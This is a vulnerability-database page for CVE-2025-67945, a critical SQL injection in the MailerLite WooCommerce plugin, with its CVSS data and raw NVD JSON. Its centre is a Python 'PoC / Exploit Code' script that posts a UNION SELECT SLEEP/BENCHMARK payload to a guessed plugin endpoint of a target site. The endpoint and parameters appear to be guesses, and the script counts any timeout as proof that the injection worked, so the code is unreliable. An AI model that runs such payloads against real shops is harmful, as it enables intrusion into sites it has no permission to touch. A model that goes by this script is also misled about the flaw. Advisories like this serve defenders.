Security Vulnerability Report
中文
CVE-2025-67945 CVSS 9.3 CRITICAL

CVE-2025-67945

Published: 2026-01-22 17:16:04
Last Modified: 2026-04-27 18:16:51

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MailerLite MailerLite – WooCommerce integration woo-mailerlite allows SQL Injection.This issue affects MailerLite – WooCommerce integration: from n/a through <= 3.1.2.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

MailerLite WooCommerce integration (woo-mailerlite) <= 3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67945 SQL Injection PoC # Target: MailerLite WooCommerce Integration Plugin <= 3.1.2 # Author: Security Researcher def exploit_sqli(target_url): """ SQL Injection exploitation for MailerLite WooCommerce plugin Note: This PoC demonstrates the vulnerability for authorized security testing only """ # Target endpoint - typically in WordPress REST API or admin-ajax.php endpoint = f"{target_url}/wp-json/mailerlite/v1/" # Malicious payload to extract database version # Using time-based blind SQL injection technique payload = { 'action': 'mailerlite_sync', 'customer_id': '1 UNION SELECT SLEEP(5),BENCHMARK(5000000,MD5(1)),2,3,4--', 'order_id': '1' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting SQL Injection in MailerLite WooCommerce plugin") print(f"[*] Payload: {payload['customer_id']}") try: # Send malicious request response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully") print(f"[+] Response: {response.text[:500]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.Timeout: print("[+] Time-based SQL injection confirmed - payload executed successfully") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-67945_poc.py <target_url>") print("Example: python cve-2025-67945_poc.py https://example.com") sys.exit(1) target = sys.argv[1] exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67945", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:04.170", "lastModified": "2026-04-27T18:16:51.107", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MailerLite MailerLite – WooCommerce integration woo-mailerlite allows SQL Injection.This issue affects MailerLite – WooCommerce integration: from n/a through <= 3.1.2."}, {"lang": "es", "value": "Neutralización inadecuada de elementos especiales utilizados en un comando SQL ('inyección SQL') vulnerabilidad en MailerLite MailerLite – integración de WooCommerce woo-mailerlite permite la inyección SQL. Este problema afecta a MailerLite – integración de WooCommerce: desde n/a hasta &lt;= 3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-mailerlite/vulnerability/wordpress-mailerlite-woocommerce-integration-plugin-3-1-2-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}